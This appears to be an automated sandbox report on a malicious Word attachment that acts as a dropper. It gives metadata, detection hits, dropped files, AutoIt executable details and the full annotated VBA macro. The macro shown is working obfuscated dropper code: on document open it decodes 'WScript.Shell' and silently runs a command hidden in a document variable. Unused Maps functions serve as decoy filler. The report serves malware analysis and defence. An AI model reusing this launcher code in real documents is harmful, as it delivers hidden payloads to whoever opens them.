Dynamic Analysis Report
Classification: Dropper, Downloader
7ea94da41974adefe99eeb883523b757cea10becf09185af05b9f464faa70712 (SHA256)
2019 Order File TTYYUGH.doc
Created at 2019-02-11 09:17:00
Notifications (2/4)
Due to a WHOIS service error, no query could be made to get WHOIS data of any contacted domain.
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
The operating system was rebooted during the analysis.
Remarks
The maximum number of reputation file hash requests (20 per analysis) was exceeded. As a result, the reputation status could not be queried for all file hashes. In order to get the reputation status for all file hashes, please increase the 'Max File Hash Requests' setting in the system configurations.
This list contains only the embedded files and created files
Filename | Category | Type | Severity | Actions |
---|---|---|---|---|
C:\Users\aETAdzjz\Desktop\2019 Order File TTYYUGH.doc | Sample File | Word Document | Suspicious | |
Title | ld6c2a |
Subject | ze3d553 |
Description | In this exquisitely made and terrifying new horror film, the age-old concepts of witchcraft, black magic and possession are innovatively brought together to tell the |
Revision | 1 |
Create Time | 2019-02-11 04:16:00+00:00 |
Modify Time | 2019-02-11 04:16:00+00:00 |
Codepage | Latin-1 |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Document Security | SecurityFlag.NONE |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Character Count | 1 |
Chars With Spaces | 1 |
Heading Pairs | Title |
Titles Of Parts | ld6c2a |
bytes | 11000 |
scale_crop | False |
shared_doc | False |
URL | First Seen | Categories | Threat Names | Reputation Status | WHOIS Data |
---|---|---|---|---|---|
http://maps.googleapis.com/maps/api/distancematrix/json?origins= | - | - | - | Unknown | Not Queried |
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: this is the ThisDocument module extracted from the sample
' (SHA256 7ea94da41974adefe99eeb883523b757cea10becf09185af05b9f464faa70712).
' The only auto-run entry point is Document_Open below. The Google Maps
' helper functions (GetDuration, GetDistanceCoord, deg2rad, rad2deg,
' GetDistance) are never called from Document_Open.
Option Explicit
' Late-bound COM object created in Document_Open. Its ProgID is hidden as a
' hex-like string and decoded at run time by v6c45839c88; the decoded value
' is "WScript.Shell". n8cfe4c59ad uses it to run a hidden command.
' NOTE(review): the report's VBA_Obfuscation_ObjectName hit presumably
' refers to this random-looking name -- not confirmed by the page.
Public s33ace8fdc5c9 As Object
' Unreferenced helper: builds a Google Distance Matrix request for the
' driving duration between two place names. Nothing in Document_Open calls
' it, so it appears to be filler/decoy code. The HTTP client and the
' "http://maps.googleapis.com/..." literal are likely what the report's
' VBA_Download_Commands rule matched on; the literal is also the URL shown
' in the report's URL table, but whether it was actually contacted cannot
' be determined from this page.
' NOTE(review): with Option Explicit in force, objHTTP, URL, regex, matches
' and tmpVal are never declared and xlListSeparator is an Excel enum, so a
' plain Word module would not compile this procedure unless a library
' reference supplies those names. The extracted source may therefore not
' be what actually executed -- confirm against the p-code if it matters.
' start, dest: place names; spaces become "+" (no other URL encoding).
' Returns: the first integer after "value" inside the "duration" object as
'          a Double, or -1 when the response lacks ""duration"" : {.
' Errors: there is no On Error statement, so a failed request or a regex
'         with no match (matches(0)) raises a run-time error; ErrorHandl
'         is only reached through the explicit GoTo.
' The API key in lastVal is the literal placeholder "YOUR_KEY".
Public Function GetDuration(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=en&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
' Synchronous GET (third argument False) with a hard-coded legacy IE UA.
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """duration"" : {") = 0 Then GoTo ErrorHandl
' Non-greedy match from "duration" to the first "value" number after it.
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = "duration(?:.|\n)*?""value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
' Swap "." for the locale list separator before CDbl (Excel-style idiom).
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDuration = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDuration = -1
End Function
' Unreferenced helper (not called from Document_Open): great-circle
' distance between two latitude/longitude pairs via the spherical law of
' cosines. The base result is in statute miles; unit "K" converts to
' kilometres (1.609344 km per mile) and "N" to nautical miles (0.8684);
' any other unit string leaves miles.
' NOTE(review): WorksheetFunction is an Excel object, not available in a
' Word module -- another sign this code was pasted in as filler.
' Two identical points give Acos(1) = 0; antipodal/rounding cases that push
' the argument outside [-1, 1] would raise a run-time error from Acos.
Public Function GetDistanceCoord(ByVal lat1 As Double, ByVal lon1 As Double, ByVal lat2 As Double, ByVal lon2 As Double, ByVal unit As String) As Double
Dim theta As Double: theta = lon1 - lon2
Dim dist As Double: dist = Math.Sin(deg2rad(lat1)) * Math.Sin(deg2rad(lat2)) + Math.Cos(deg2rad(lat1)) * Math.Cos(deg2rad(lat2)) * Math.Cos(deg2rad(theta))
dist = WorksheetFunction.Acos(dist)
dist = rad2deg(dist)
' Degrees of arc -> nautical miles (60 per degree) -> statute miles.
dist = dist * 60 * 1.1515
If unit = "K" Then
dist = dist * 1.609344
ElseIf unit = "N" Then
dist = dist * 0.8684
End If
GetDistanceCoord = dist
End Function
' Degrees -> radians. Only used by GetDistanceCoord (itself unreferenced).
' Relies on Excel's WorksheetFunction.Pi, which a Word module does not have.
Function deg2rad(ByVal deg As Double) As Double
deg2rad = (deg * WorksheetFunction.Pi / 180#)
End Function
' Radians -> degrees. Only used by GetDistanceCoord (itself unreferenced).
' Relies on Excel's WorksheetFunction.Pi, which a Word module does not have.
Function rad2deg(ByVal rad As Double) As Double
rad2deg = rad / WorksheetFunction.Pi * 180#
End Function
' Auto-run entry point: executes when the document is opened with macros
' enabled. What the visible code does:
'  1. Creates the COM object whose ProgID is hidden in the hex-like string
'     below; decoding it with v6c45839c88 yields "WScript.Shell".
'  2. Runs a Select Case on a constant (n8a5c2884d54 = 10). The dozens of
'     arithmetic Case expressions are junk branches that only assign a
'     string to d8b2c8b5b9, which is never read. The literal `Case 10:`
'     branch calls n8cfe4c59ad, which runs the hidden command.
' NOTE(review): Select Case takes the first matching branch in order. The
' arithmetic branches were not all evaluated here; if exact flow matters,
' confirm none of them resolves to 10 before the `Case 10:` line.
' v7ecf581c3c363b7639 is declared and never used. The argument
' "lcd7e4fd5f" passed to n8cfe4c59ad is ignored by that function.
' Defender view: the observable is WINWORD.EXE creating WScript.Shell and
' spawning a hidden child process on document open.
Sub Document_Open()
' "938F9FAEA5ACB06A8FA4A1A8A8" -> hex pairs minus 60 -> "WScript.Shell"
Set s33ace8fdc5c9 = CreateObject(v6c45839c88("938F9FAEA5ACB06A8FA4A1A8A8"))
' Constant selector; only the `Case 10:` branch is meant to run.
Dim n8a5c2884d54 As Long: n8a5c2884d54 = 10
Dim d8b2c8b5b9 As String
Dim v7ecf581c3c363b7639 As Long
Select Case n8a5c2884d54
' --- junk branches: assign an unused string, no other effect ---
Case 18 / Int(24 + 21 / 21) / 13 / Int(9 + 26 / 14) / 10
d8b2c8b5b9 = "j2c61c53"
Case 8 - (21 + 21) - 5 + (192 - 312) + Int(20 + 19 - 22) + 18
d8b2c8b5b9 = "g6f9d8ec638fe23"
Case 11 + (336 - 204) + Int(12 + 15 - 21) + 11 - (6 + 19) - 27 * Int(94 / 91 + 19) - Int(4196 / 1845) * 20
d8b2c8b5b9 = "ae8bafbc4"
Case 17 - (28 + 4) - 6 * Int(79 / 94 + 15) - Int(1265 / 1203) * 10
d8b2c8b5b9 = "o536c9fd"
Case 17 - (9 + 23) - 29 * Int(40 / 34 + 16) - Int(4223 / 3561) * 9 * Int(43 / 52 + 13) - Int(4880 / 5548) * 17
d8b2c8b5b9 = "g6434749aa99a"
Case 24 - (21 + 12) - 10 * Int(84 / 38 + 12) - Int(3318 / 1447) * 18 * Int(91 / 86 + 15) - Int(4864 / 2601) * 25
d8b2c8b5b9 = "rb861c34df544"
Case 28 / Int(26 + 25 / 5) / 28 + (96 - 180) + Int(6 + 21 - 28) + 11
d8b2c8b5b9 = "rf99bd"
Case 28 - (26 + 12) - 14 - (26 + 5) - 6 * Int(79 / 97 + 14) - Int(3661 / 4548) * 13
d8b2c8b5b9 = "v55ed1fa"
Case 27 + (144 - 240) + Int(5 + 7 - 26) + 27 * Int(55 / 50 + 14) - Int(4041 / 3725) * 22 * Int(13 / 66 + 19) - Int(4977 / 4926) * 5
d8b2c8b5b9 = "c3eb74ec8a5c"
Case 16 / Int(8 + 27 / 22) / 8 + (132 - 216) + Int(21 + 13 - 22) + 16 + (216 - 168) + Int(13 + 11 - 7) + 27
d8b2c8b5b9 = "o89da94b"
Case 25 / Int(28 + 24 / 13) / 10 * Int(67 / 51 + 19) - Int(3907 / 3819) * 25
d8b2c8b5b9 = "a6721c2c6d3b6cf"
Case 18 + (324 - 96) + Int(13 + 4 - 29) + 27 * Int(9 / 40 + 12) - Int(3206 / 5343) * 4
d8b2c8b5b9 = "ofb6ab34527ea"
Case 8 - (27 + 11) - 14 + (96 - 48) + Int(12 + 28 - 19) + 9 * Int(62 / 92 + 11) - Int(3350 / 5894) * 28
d8b2c8b5b9 = "k1a442dfc"
Case 7 - (16 + 12) - 21 / Int(19 + 15 / 28) / 13
d8b2c8b5b9 = "c5d1312545d4"
Case 26 - (11 + 26) - 29 - (4 + 24) - 12 + (348 - 276) + Int(14 + 13 - 9) + 7
d8b2c8b5b9 = "p97cd69ec"
Case 20 + (276 - 204) + Int(28 + 18 - 13) + 8 - (17 + 8) - 5 + (252 - 72) + Int(29 + 12 - 25) + 19
d8b2c8b5b9 = "d8cbb37e1"
Case 19 + (48 - 108) + Int(5 + 22 - 10) + 16 + (156 - 108) + Int(18 + 12 - 5) + 4 / Int(17 + 27 / 9) / 26
d8b2c8b5b9 = "fbf7bbd9c5fc675"
Case 8 + (84 - 132) + Int(29 + 5 - 20) + 6 / Int(26 + 18 / 8) / 6 + (48 - 216) + Int(25 + 13 - 4) + 7
d8b2c8b5b9 = "tfa3d72373fff"
Case 12 * Int(98 / 46 + 12) - Int(3698 / 829) * 4 - (19 + 6) - 9 + (276 - 84) + Int(14 + 15 - 8) + 15
d8b2c8b5b9 = "ef7f3d4aac29c"
Case 29 + (132 - 72) + Int(19 + 8 - 18) + 13 / Int(6 + 12 / 20) / 26 + (264 - 216) + Int(7 + 22 - 28) + 5
d8b2c8b5b9 = "ndcff162e79c3"
Case 22 / Int(23 + 12 / 23) / 26 / Int(4 + 17 / 7) / 15
d8b2c8b5b9 = "v35849"
Case 26 + (324 - 120) + Int(17 + 25 - 6) + 10 - (16 + 27) - 20
d8b2c8b5b9 = "wffe2b"
Case 21 - (14 + 29) - 11 + (180 - 72) + Int(4 + 13 - 20) + 13 * Int(70 / 40 + 11) - Int(4427 / 4106) * 8
d8b2c8b5b9 = "v8ae49641"
Case 26 * Int(19 / 34 + 12) - Int(4837 / 2741) * 26 / Int(23 + 5 / 20) / 14 + (108 - 192) + Int(7 + 16 - 15) + 16
d8b2c8b5b9 = "a91db91f479214e"
Case 17 * Int(42 / 43 + 12) - Int(2462 / 4951) * 28 - (20 + 22) - 29
d8b2c8b5b9 = "f686b8f9c16"
Case 18 * Int(55 / 91 + 16) - Int(242 / 4383) * 21 - (22 + 15) - 28
d8b2c8b5b9 = "r491b494358"
Case 22 * Int(52 / 45 + 9) - Int(3428 / 3718) * 13 + (72 - 348) + Int(28 + 11 - 10) + 11
d8b2c8b5b9 = "k88d6711911a54"
Case 28 - (6 + 26) - 23 * Int(36 / 92 + 17) - Int(1972 / 28) * 7
d8b2c8b5b9 = "w41b5c"
Case 18 * Int(92 / 62 + 17) - Int(182 / 953) * 28 / Int(23 + 23 / 19) / 9
d8b2c8b5b9 = "ya83f65548728c"
Case 29 + (144 - 48) + Int(20 + 23 - 9) + 14 * Int(60 / 67 + 10) - Int(4879 / 3526) * 4 / Int(20 + 6 / 16) / 7
d8b2c8b5b9 = "qdf9f4c"
Case 7 / Int(10 + 28 / 22) / 21 / Int(4 + 20 / 8) / 19 / Int(28 + 22 / 5) / 15
d8b2c8b5b9 = "e5257ac4ddba8fc"
Case 14 / Int(8 + 22 / 26) / 13 - (17 + 12) - 15
d8b2c8b5b9 = "m6e62cd66b2c"
Case 11 / Int(15 + 20 / 4) / 8 + (144 - 180) + Int(14 + 8 - 5) + 21
d8b2c8b5b9 = "t7c57888b742e"
Case 21 * Int(75 / 97 + 18) - Int(497 / 1477) * 26 * Int(67 / 63 + 12) - Int(3557 / 3108) * 21
d8b2c8b5b9 = "p7cb6a8e"
Case 24 / Int(11 + 15 / 26) / 10 * Int(36 / 77 + 12) - Int(535 / 5680) * 7 / Int(15 + 8 / 12) / 6
d8b2c8b5b9 = "p14616963"
Case 24 * Int(92 / 75 + 9) - Int(3602 / 5378) * 17 * Int(63 / 83 + 18) - Int(1045 / 1299) * 26 + (156 - 336) + Int(8 + 29 - 17) + 22
d8b2c8b5b9 = "q3f8fa1e3395dd3"
Case 23 - (7 + 27) - 28 / Int(18 + 26 / 28) / 20 + (168 - 96) + Int(23 + 15 - 12) + 13
d8b2c8b5b9 = "w4a6c61e7dcc1cc"
' --- the live branch: selector is 10, so this runs the hidden command ---
Case 10:
n8cfe4c59ad ("lcd7e4fd5f")
' --- more junk branches (unreachable once Case 10 has matched) ---
Case 11 / Int(16 + 10 / 19) / 23 + (132 - 144) + Int(29 + 25 - 4) + 15 * Int(39 / 93 + 16) - Int(1721 / 5656) * 5
d8b2c8b5b9 = "b3fa886"
Case 18 + (60 - 156) + Int(29 + 28 - 29) + 25 - (28 + 16) - 8
d8b2c8b5b9 = "b6f545c1c"
Case 25 - (11 + 5) - 19 - (21 + 21) - 4 + (324 - 144) + Int(19 + 14 - 7) + 22
d8b2c8b5b9 = "ne677ccbbb8e71"
Case 29 - (14 + 29) - 29 / Int(24 + 9 / 8) / 17 * Int(30 / 82 + 11) - Int(1534 / 5784) * 26
d8b2c8b5b9 = "l3573aa7911155"
Case 21 + (324 - 336) + Int(26 + 27 - 18) + 12 / Int(10 + 25 / 25) / 29 + (228 - 144) + Int(13 + 27 - 16) + 26
d8b2c8b5b9 = "e699f7"
Case 13 / Int(8 + 25 / 23) / 22 * Int(27 / 57 + 12) - Int(501 / 172) * 29
d8b2c8b5b9 = "j5d8774c"
Case 26 / Int(19 + 21 / 14) / 24 - (13 + 18) - 17
d8b2c8b5b9 = "b9e5b13416271f"
Case 5 * Int(62 / 82 + 9) - Int(1798 / 3090) * 22 * Int(30 / 73 + 15) - Int(3007 / 5717) * 18
d8b2c8b5b9 = "uf8abe8b43"
Case 20 + (216 - 240) + Int(22 + 22 - 5) + 26 - (7 + 7) - 7
d8b2c8b5b9 = "g44ccd6f22f9a4c"
Case 16 - (9 + 29) - 27 / Int(22 + 29 / 15) / 24
d8b2c8b5b9 = "j3f38e21294"
Case 11 + (96 - 300) + Int(18 + 26 - 11) + 4 + (48 - 192) + Int(28 + 13 - 27) + 16
d8b2c8b5b9 = "ba75c719ae4da"
Case 11 * Int(20 / 39 + 12) - Int(3767 / 1750) * 9 * Int(33 / 93 + 18) - Int(748 / 1613) * 19 / Int(11 + 16 / 15) / 9
d8b2c8b5b9 = "bdb17f99f2e9f5"
Case 8 - (14 + 20) - 24 - (9 + 27) - 19 * Int(17 / 87 + 9) - Int(1281 / 3988) * 15
d8b2c8b5b9 = "c5d4532"
Case 7 - (21 + 23) - 4 / Int(6 + 25 / 27) / 6 / Int(15 + 13 / 27) / 19
d8b2c8b5b9 = "r6dccec9b271d"
Case 28 / Int(18 + 16 / 27) / 25 + (108 - 288) + Int(24 + 5 - 28) + 4 + (264 - 312) + Int(24 + 27 - 16) + 6
d8b2c8b5b9 = "jbdb64"
Case 22 + (168 - 276) + Int(13 + 5 - 13) + 8 - (8 + 24) - 9 + (180 - 240) + Int(26 + 5 - 6) + 4
d8b2c8b5b9 = "jc16774f4"
Case 20 + (276 - 132) + Int(11 + 15 - 20) + 28 / Int(24 + 22 / 22) / 16 * Int(48 / 92 + 12) - Int(2860 / 3784) * 10
d8b2c8b5b9 = "kf4f54d64c"
Case 19 / Int(9 + 29 / 19) / 21 + (276 - 180) + Int(8 + 11 - 5) + 27
d8b2c8b5b9 = "p22d774b"
Case 9 - (5 + 16) - 22 + (156 - 252) + Int(7 + 12 - 14) + 4
d8b2c8b5b9 = "k77de361f23"
Case 24 / Int(19 + 15 / 29) / 9 - (18 + 29) - 4 - (13 + 4) - 6
d8b2c8b5b9 = "obfb49f2ae"
Case 11 / Int(7 + 24 / 22) / 8 / Int(17 + 8 / 23) / 23
d8b2c8b5b9 = "c6c583a99e"
Case 17 + (228 - 156) + Int(10 + 23 - 11) + 23 * Int(21 / 53 + 19) - Int(1574 / 870) * 10 * Int(78 / 68 + 18) - Int(2798 / 32) * 27
d8b2c8b5b9 = "g42fbb761c3a6"
End Select
End Sub
' Payload launcher. Reads the document variable "f3744ca427ddf", decodes
' its value with v6c45839c88 and passes the result to WScript.Shell.Run on
' the global object s33ace8fdc5c9, with window style 0 (hidden) and
' bWaitOnReturn = True. The decoded command itself is not part of this
' report (it lives in the document's Variables collection, not the VBA).
' The parameter j2664a23fa3e66 is never used and no return value is
' assigned, so callers get an empty string.
' NOTE(review): the report also lists AutoIt3.exe version info and files
' under %APPDATA%\9468738f -- presumably the dropped payload, but nothing
' on this page ties them to the command run here; verify from the
' document variable before asserting that.
Private Function n8cfe4c59ad(ByVal j2664a23fa3e66 As String) As String
s33ace8fdc5c9.Run v6c45839c88(ActiveDocument.Variables("f3744ca427ddf").Value), 0, True
End Function
' String decoder used for the WScript.Shell ProgID and the document-variable
' command. Input j2664a23fa3e66 is a run of two-character hex pairs; each
' pair is parsed as hex, 60 is subtracted and the result is turned into a
' character. The arithmetic hides the constants:
'   Chr(Int(... + 25)) evaluates to Chr(38) = "&" and
'   Chr(Int(... + 86)) evaluates to Chr(72) = "H", so Val("&H" & pair) is
'   a hex parse; (34 + 6 - 20) / 2 - 9 = 1 and 43 - 23 - 10 + 5 - 13 = 2
'   make Right(Left(s, i + 1), 2) the two characters at position i.
' Equivalent per step: Chr(CLng("&H" & Mid(j2664a23fa3e66, i, 2)) - 60).
' Example: "93" -> &H93 = 147 -> 147 - 60 = 87 -> "W".
' Returns the decoded string; an empty input returns an empty string.
Private Function v6c45839c88(ByVal j2664a23fa3e66 As String)
Dim l9a5e7d996c As String: Dim f8b5964b14a9a8c As Long
For f8b5964b14a9a8c = 1 To Len(j2664a23fa3e66) Step 2
l9a5e7d996c = l9a5e7d996c & Chr(Val(Chr(Int(0 + Int(14 / 7) - 8 + Int(11 / 9) + Int(10 / 1) + 5 + Int(10 / 7) + Int(13 / 7) + Int(9 / 9) + 25)) & Chr(Int(0 + Int(9 / 8) - 11 + 5 + 4 - 13 + 86)) & Right(Left(j2664a23fa3e66, f8b5964b14a9a8c + ((34 + 6 - 20) / 2 - 9)), (43 - 23 - 10 + 5 - 13))) - 60)
Next
v6c45839c88 = l9a5e7d996c
End Function
' Unreferenced helper, near-copy of GetDuration: requests the driving
' distance between two place names from the Google Distance Matrix API.
' Nothing in Document_Open calls it. Differences from GetDuration: the
' query uses language=pl, the presence check is for ""distance"" : {, and
' the regex matches the first "value" number anywhere in the response
' rather than one scoped to the distance object.
' NOTE(review): same compile concern as GetDuration -- under Option
' Explicit the undeclared objHTTP/URL/regex/matches/tmpVal and the Excel
' constant xlListSeparator would not compile in a Word module without a
' supporting reference; the shown source may differ from what ran.
' Returns: the matched integer as a Double, or -1 via the GoTo; there is
'          no On Error handler, so request failures raise run-time errors.
' The API key in lastVal is the literal placeholder "YOUR_KEY".
Public Function GetDistance(start As String, dest As String)
Dim firstVal As String, secondVal As String, lastVal As String
firstVal = "http://maps.googleapis.com/maps/api/distancematrix/json?origins="
secondVal = "&destinations="
lastVal = "&mode=car&language=pl&sensor=false&key=YOUR_KEY"
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
URL = firstVal & Replace(start, " ", "+") & secondVal & Replace(dest, " ", "+") & lastVal
' Synchronous GET (third argument False) with a hard-coded legacy IE UA.
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.send ("")
If InStr(objHTTP.responseText, """distance"" : {") = 0 Then GoTo ErrorHandl
Set regex = CreateObject("VBScript.RegExp"): regex.Pattern = """value"".*?([0-9]+)": regex.Global = False
Set matches = regex.Execute(objHTTP.responseText)
' Swap "." for the locale list separator before CDbl (Excel-style idiom).
tmpVal = Replace(matches(0).SubMatches(0), ".", Application.International(xlListSeparator))
GetDistance = CDbl(tmpVal)
Exit Function
ErrorHandl:
GetDistance = -1
End Function
Rule Name | Rule Description | Classification | Severity | Actions |
---|---|---|---|---|
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - | 3/5 | |
VBA_Execution_Commands | VBA macro may execute files or system commands | - | 3/5 | |
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - | 3/5 | |
VBA_Execution_Commands | VBA macro may execute files or system commands | - | 3/5 | |
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - | 2/5 | |
VBA_Obfuscation_ObjectName | VBA initializes COM object from long variable name; possible obfuscation | - | 2/5 | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
C:\Users\aETAdzjz\AppData\Local\Temp\atsamxnv.cmdline | Created File | Text | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Unknown | |
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.word\~wrs{a60a3be7-00a8-4b59-b7cf-d5673d1a51a1}.tmp | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
c:\users\aetadzjz\appdata\roaming\9468738f\946logrc.ini | Created File | Stream | Not Queried | |
Image Base | 0x400000 |
Entry Point | 0x427ffa |
Size Of Code | 0x8e800 |
Size Of Initialized Data | 0x4d800 |
File Type | executable |
Subsystem | windows_gui |
Machine Type | i386 |
Compile Timestamp | 2018-03-15 13:14:39+00:00 |
LegalCopyright | ©1999-2018 Jonathan Bennett & AutoIt Team |
InternalName | AutoIt3.exe |
FileVersion | 3, 3, 14, 5 |
CompanyName | AutoIt Team |
Comments | http://www.autoitscript.com/autoit3/ |
ProductName | AutoIt v3 Script |
ProductVersion | 3, 3, 14, 5 |
FileDescription | AutoIt v3 Script |
OriginalFilename | AutoIt3.exe |
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x401000 | 0x8e7b1 | 0x8e800 | 0x400 | cnt_code, mem_execute, mem_read | 6.67 |
.rdata | 0x490000 | 0x2fd8e | 0x2fe00 | 0x8ec00 | cnt_initialized_data, mem_read | 5.76 |
.data | 0x4c0000 | 0x8f74 | 0x5200 | 0xbea00 | cnt_initialized_data, mem_read, mem_write | 1.19 |
.rsrc | 0x4c9000 | 0xd750 | 0xd800 | 0xc3c00 | cnt_initialized_data, mem_read | 5.93 |
.reloc | 0x4d7000 | 0x71ac | 0x7200 | 0xd1400 | cnt_initialized_data, mem_discardable, mem_read | 6.8 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
WSACleanup | 0x74 | 0x4907c8 | 0xbda10 | 0xbc610 | - |
socket | 0x17 | 0x4907cc | 0xbda14 | 0xbc614 | - |
inet_ntoa | 0xc | 0x4907d0 | 0xbda18 | 0xbc618 | - |
setsockopt | 0x15 | 0x4907d4 | 0xbda1c | 0xbc61c | - |
ntohs | 0xf | 0x4907d8 | 0xbda20 | 0xbc620 | - |
recvfrom | 0x11 | 0x4907dc | 0xbda24 | 0xbc624 | - |
ioctlsocket | 0xa | 0x4907e0 | 0xbda28 | 0xbc628 | - |
htons | 0x9 | 0x4907e4 | 0xbda2c | 0xbc62c | - |
WSAStartup | 0x73 | 0x4907e8 | 0xbda30 | 0xbc630 | - |
__WSAFDIsSet | 0x97 | 0x4907ec | 0xbda34 | 0xbc634 | - |
select | 0x12 | 0x4907f0 | 0xbda38 | 0xbc638 | - |
accept | 0x1 | 0x4907f4 | 0xbda3c | 0xbc63c | - |
listen | 0xd | 0x4907f8 | 0xbda40 | 0xbc640 | - |
bind | 0x2 | 0x4907fc | 0xbda44 | 0xbc644 | - |
closesocket | 0x3 | 0x490800 | 0xbda48 | 0xbc648 | - |
WSAGetLastError | 0x6f | 0x490804 | 0xbda4c | 0xbc64c | - |
recv | 0x10 | 0x490808 | 0xbda50 | 0xbc650 | - |
sendto | 0x14 | 0x49080c | 0xbda54 | 0xbc654 | - |
send | 0x13 | 0x490810 | 0xbda58 | 0xbc658 | - |
inet_addr | 0xb | 0x490814 | 0xbda5c | 0xbc65c | - |
gethostbyname | 0x34 | 0x490818 | 0xbda60 | 0xbc660 | - |
gethostname | 0x39 | 0x49081c | 0xbda64 | 0xbc664 | - |
connect | 0x4 | 0x490820 | 0xbda68 | 0xbc668 | - |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
GetFileVersionInfoW | 0x0 | 0x49076c | 0xbd9b4 | 0xbc5b4 | 0x6 |
GetFileVersionInfoSizeW | 0x0 | 0x490770 | 0xbd9b8 | 0xbc5b8 | 0x5 |
VerQueryValueW | 0x0 | 0x490774 | 0xbd9bc | 0xbc5bc | 0xe |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
timeGetTime | 0x0 | 0x4907b8 | 0xbda00 | 0xbc600 | 0x94 |
waveOutSetVolume | 0x0 | 0x4907bc | 0xbda04 | 0xbc604 | 0xbb |
mciSendStringW | 0x0 | 0x4907c0 | 0xbda08 | 0xbc608 | 0x32 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
ImageList_ReplaceIcon | 0x0 | 0x490088 | 0xbd2d0 | 0xbbed0 | 0x6f |
ImageList_Destroy | 0x0 | 0x49008c | 0xbd2d4 | 0xbbed4 | 0x54 |
ImageList_Remove | 0x0 | 0x490090 | 0xbd2d8 | 0xbbed8 | 0x6d |
ImageList_SetDragCursorImage | 0x0 | 0x490094 | 0xbd2dc | 0xbbedc | 0x72 |
ImageList_BeginDrag | 0x0 | 0x490098 | 0xbd2e0 | 0xbbee0 | 0x50 |
ImageList_DragEnter | 0x0 | 0x49009c | 0xbd2e4 | 0xbbee4 | 0x56 |
ImageList_DragLeave | 0x0 | 0x4900a0 | 0xbd2e8 | 0xbbee8 | 0x57 |
ImageList_EndDrag | 0x0 | 0x4900a4 | 0xbd2ec | 0xbbeec | 0x5e |
ImageList_DragMove | 0x0 | 0x4900a8 | 0xbd2f0 | 0xbbef0 | 0x58 |
InitCommonControlsEx | 0x0 | 0x4900ac | 0xbd2f4 | 0xbbef4 | 0x7b |
ImageList_Create | 0x0 | 0x4900b0 | 0xbd2f8 | 0xbbef8 | 0x53 |
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
WNetUseConnectionW | 0x0 | 0x4903f8 | 0xbd640 | 0xbc240 | 0x49 |
WNetCancelConnection2W | 0x0 | 0x4903fc | 0xbd644 | 0xbc244 | 0xc |
